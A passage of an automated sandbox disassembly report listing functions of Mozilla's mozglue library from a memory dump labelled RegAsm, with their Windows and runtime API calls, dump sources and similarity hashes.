                                                                                    • Instruction Fuzzy Hash: AC518CB1A042068FEB14CF68D8807AEB7B5EF59308F164839C516D7711E731F958CB69
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71284D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71289A
                                                                                    • free.MOZGLUE(?,?,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C7128F1
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C712910
                                                                                    • free.MOZGLUE(00000001,?,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71293C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C712620,?,?,?,6C7060AA,6C705FCB,6C7079A3), ref: 6C71294E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 5c39f3d08181d3325266c1ae6dd8d3de9cade9cd5f556fff5669783bada5b7b6
                                                                                    • Instruction ID: bd0159aa8e785d83a5013cdffae3aa83a6376bd3f9712fa3f978992dc328cdd2
                                                                                    • Opcode Fuzzy Hash: 5c39f3d08181d3325266c1ae6dd8d3de9cade9cd5f556fff5669783bada5b7b6
                                                                                    • Instruction Fuzzy Hash: E741E2B1A082068FEB10CF6CD98476A77F6EF46308F290939D556EBB41E731E904CB65
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6CCFF6
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6CD026
                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C6CD06C
                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C6CD139
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 1090480015-2608361144
                                                                                    • Opcode ID: 3156ba18525c18af6ddba5fa8059982665277936aa117a0b45a447428dc31835
                                                                                    • Instruction ID: 521d0a20a438fb7bcfd5fd5b0492d577c64f0e084dbcccd4277299ef3042786d
                                                                                    • Opcode Fuzzy Hash: 3156ba18525c18af6ddba5fa8059982665277936aa117a0b45a447428dc31835
                                                                                    • Instruction Fuzzy Hash: 82411571B8071A4FDB05DE7C8C903AAB6B0EB4A738F15413AE918E7784D7B19C018BC9
                                                                                    APIs
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6C4E5A
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6C4E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C4EE9
                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6C4F02
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C6C4F1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                    • String ID:
                                                                                    • API String ID: 713647276-0
                                                                                    • Opcode ID: 1b2f5f167d0fb814465d5fa4c0143b95d30370a4016f89d2661fd1b3342bf830
                                                                                    • Instruction ID: a6b3407c13ee5a5d388b928ddbfcd7cdf3b2e51efa95c27b5e94c9339d7ff13e
                                                                                    • Opcode Fuzzy Hash: 1b2f5f167d0fb814465d5fa4c0143b95d30370a4016f89d2661fd1b3342bf830
                                                                                    • Instruction Fuzzy Hash: EC41D0716047059FC701CF29C8809BBBBE4FF8A354F108A2DF56587641DBB0E915CB96
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6DC1BC
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6DC1DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                    • String ID:
                                                                                    • API String ID: 1885715127-0
                                                                                    • Opcode ID: 9b6ac43b5164da892059342922a2de022a91d07f86337cf48ed7877dc7a395ac
                                                                                    • Instruction ID: 95322dc6d44c95a805fe94077c07056d219898cb6146da9ba8c4a059b1b8a070
                                                                                    • Opcode Fuzzy Hash: 9b6ac43b5164da892059342922a2de022a91d07f86337cf48ed7877dc7a395ac
                                                                                    • Instruction Fuzzy Hash: 3E41D1B1D083549FD710DF64C58079ABBE4BF8A308F01856EE89A9B712E730E548CBD6
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74F770), ref: 6C72A858
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C72A87B
                                                                                      • Part of subcall function 6C72A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C72A88F,00000000), ref: 6C72A9F1
                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C72A8FF
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C72A90C
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F770), ref: 6C72A97E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1355178011-0
                                                                                    • Opcode ID: b72d47f9aefe739b84847edc084d0b7941ebfc098e92c8e721343c8fb9f4d0c8
                                                                                    • Instruction ID: 8fe7cdd9f34cb7f86cffb1368ada7b19ce2d62277eeec374d7d145f060a0dbe7
                                                                                    • Opcode Fuzzy Hash: b72d47f9aefe739b84847edc084d0b7941ebfc098e92c8e721343c8fb9f4d0c8
                                                                                    • Instruction Fuzzy Hash: 9641A3B0E002448FDB00DFA4D949BDEBB75FF08324F108629E866AB791D735E945CB91
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D159C
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D15BC
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D15E7
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D1606
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C6D152B,?,?,?,?,6C6D1248,?), ref: 6C6D1637
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 733145618-0
                                                                                    • Opcode ID: 90e5af0cf063933471e988c8792691fbb01d7132c23acc497ee4486ab673db35
                                                                                    • Instruction ID: c90f9182462851984be336155882aa08f729e66c0f98644727a1cf2fab4a2456
                                                                                    • Opcode Fuzzy Hash: 90e5af0cf063933471e988c8792691fbb01d7132c23acc497ee4486ab673db35
                                                                                    • Instruction Fuzzy Hash: A0312CB1A001148BC7148E7CD8504AE73E5FB8137472A0B6DE423DBBD4EB70F9058799
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AD9D
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72ADAC
                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AE01
                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AE1D
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C73E330,?,6C6EC059), ref: 6C72AE3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3161513745-0
                                                                                    • Opcode ID: 91f4f78470e395b6bada8ef0f13cfdc14f4f0979d95b0deea24a9e5629c1ca4a
                                                                                    • Instruction ID: b78ad46456a1a8bf7e75b1cdda01a0937ee35ce1da5791289df47ef9d8439f6f
                                                                                    • Opcode Fuzzy Hash: 91f4f78470e395b6bada8ef0f13cfdc14f4f0979d95b0deea24a9e5629c1ca4a
                                                                                    • Instruction Fuzzy Hash: 0D3193B1D002259FD710DF758D49AABB7F8EF49624F158829E85AD7700E734A805C7A4
                                                                                    APIs
                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C73DCA0,?,?,?,6C6FE8B5,00000000), ref: 6C725F1F
                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C6FE8B5,00000000), ref: 6C725F4B
                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C6FE8B5,00000000), ref: 6C725F7B
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C6FE8B5,00000000), ref: 6C725F9F
                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C6FE8B5,00000000), ref: 6C725FD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                    • String ID:
                                                                                    • API String ID: 1389714915-0
                                                                                    • Opcode ID: e15ad421720d37bf3c7317b7f15a16bf2c04eca1c3818e26275f5f5f0c3ef33c
                                                                                    • Instruction ID: 81ef91acd0e6ae2e82936dda83ace1ef569251b54dc51da3525791605a952d77
                                                                                    • Opcode Fuzzy Hash: e15ad421720d37bf3c7317b7f15a16bf2c04eca1c3818e26275f5f5f0c3ef33c
                                                                                    • Instruction Fuzzy Hash: 74313034300A008FD760DF29D998E2AB7F9FF89319BA48569F55687B99C735EC41CB80
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6CB532
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6CB55B
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6CB56B
                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C6CB57E
                                                                                    • free.MOZGLUE(00000000), ref: 6C6CB58F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 4244350000-0
                                                                                    • Opcode ID: ee20ec3034c74f4fcf6042a7a0e46966e6cbd12c73fbbbe31c781b201a929a02
                                                                                    • Instruction ID: c9755b580e49071d1329a37e6ec8215303deace2f09e640ad455ab2b9741be53
                                                                                    • Opcode Fuzzy Hash: ee20ec3034c74f4fcf6042a7a0e46966e6cbd12c73fbbbe31c781b201a929a02
                                                                                    • Instruction Fuzzy Hash: 9A210571B002059BDB009F68CC40BAEBBB9FF86308F684129E818DB341E736D911CBA5
                                                                                    APIs
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C6CB7CF
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6CB808
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6CB82C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6CB840
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CB849
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1977084945-0
                                                                                    • Opcode ID: ee81c30a69717da16b070d8c6ad43eb7d0325330b8d12ebcc0d40ed6c52a6cd4
                                                                                    • Instruction ID: 5b6f275b27a1f57b663b43de6022516fcba299ce21010f3a6f1413a2b72a3d62
                                                                                    • Opcode Fuzzy Hash: ee81c30a69717da16b070d8c6ad43eb7d0325330b8d12ebcc0d40ed6c52a6cd4
                                                                                    • Instruction Fuzzy Hash: 50213DB1E002199FDF04DFA9D8855FEBBB4EF89318F14812AEC15A7341E731A944CBA5
                                                                                    APIs
                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C726E78
                                                                                      • Part of subcall function 6C726A10: InitializeCriticalSection.KERNEL32(6C74F618), ref: 6C726A68
                                                                                      • Part of subcall function 6C726A10: GetCurrentProcess.KERNEL32 ref: 6C726A7D
                                                                                      • Part of subcall function 6C726A10: GetCurrentProcess.KERNEL32 ref: 6C726AA1
                                                                                      • Part of subcall function 6C726A10: EnterCriticalSection.KERNEL32(6C74F618), ref: 6C726AAE
                                                                                      • Part of subcall function 6C726A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C726AE1
                                                                                      • Part of subcall function 6C726A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C726B15
                                                                                      • Part of subcall function 6C726A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C726B65
                                                                                      • Part of subcall function 6C726A10: LeaveCriticalSection.KERNEL32(6C74F618,?,?), ref: 6C726B83
                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6C726EC1
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C726EE1
                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C726EED
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C726EFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                    • String ID:
                                                                                    • API String ID: 4058739482-0
                                                                                    • Opcode ID: d1f641b76183b913c99e0d5f2766b557bb0719e987e7e8e8c7ac082311f23ab1
                                                                                    • Instruction ID: e26eb2a9bb122376d3ff4282539dd8062f7415e6959ea053dbb7185ce84d5ba4
                                                                                    • Opcode Fuzzy Hash: d1f641b76183b913c99e0d5f2766b557bb0719e987e7e8e8c7ac082311f23ab1
                                                                                    • Instruction Fuzzy Hash: 2921C4B1A042198FCF10DF69D98569E77F5FF84308F04803AE80D97240EB74AA488F92
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C6C3DEF), ref: 6C700D71
                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C6C3DEF), ref: 6C700D84
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C6C3DEF), ref: 6C700DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Free$Alloc
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 1852963964-2186867486
                                                                                    • Opcode ID: d1c84adde142c374d1cc9591190f304c5b5eaf98738ce879be261c5eb51ecde0
                                                                                    • Instruction ID: 464f273b0dca7ccfbf64b5ebd907e0368ba4fe326ae45b22571bbf57de35fa8e
                                                                                    • Opcode Fuzzy Hash: d1c84adde142c374d1cc9591190f304c5b5eaf98738ce879be261c5eb51ecde0
                                                                                    • Instruction Fuzzy Hash: F6F089B138079423E62429665E0BF6A279D67C2B75F34C036F608DA9C0DA64F814D7B5
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 6C72586C
                                                                                    • CloseHandle.KERNEL32 ref: 6C725878
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C725898
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7258C9
                                                                                    • free.MOZGLUE(00000000), ref: 6C7258D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CloseHandleObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1910681409-0
                                                                                    • Opcode ID: d244c14abc6a5cb3a05d0c30d6b71c30c91327ae13202030481fb22903b9564f
                                                                                    • Instruction ID: 844e28e6ed3f74bf85a46ea5d02ae71e8ed51cef695f58fd17849e14626a5d88
                                                                                    • Opcode Fuzzy Hash: d244c14abc6a5cb3a05d0c30d6b71c30c91327ae13202030481fb22903b9564f
                                                                                    • Instruction Fuzzy Hash: 4D011D717042019BDF00FF2AED08A16BBB9EB9332E724C177E51AD2610E77598158F95
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C7175C4,?), ref: 6C71762B
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C7174D7,6C7215FC,?,?,?), ref: 6C717644
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71765A
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7174D7,6C7215FC,?,?,?), ref: 6C717663
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7174D7,6C7215FC,?,?,?), ref: 6C717677
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 418114769-0
                                                                                    • Opcode ID: 33d72232222413bf85af49d28af20d6a8b62051eb50ad97bc9d416b13b4ae7c9
                                                                                    • Instruction ID: 680a5d7e3c56058007e82c6ce8b95cdcd86944576c743033b1f8ecce5c9a6df5
                                                                                    • Opcode Fuzzy Hash: 33d72232222413bf85af49d28af20d6a8b62051eb50ad97bc9d416b13b4ae7c9
                                                                                    • Instruction Fuzzy Hash: CBF08171E10755ABD7009F61C848A69B778FFEA259F118366F90542601E7B0B9D08BD0
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C721800
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C6C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C703EBD,6C703EBD,00000000), ref: 6C6C42A9
                                                                                    Strings
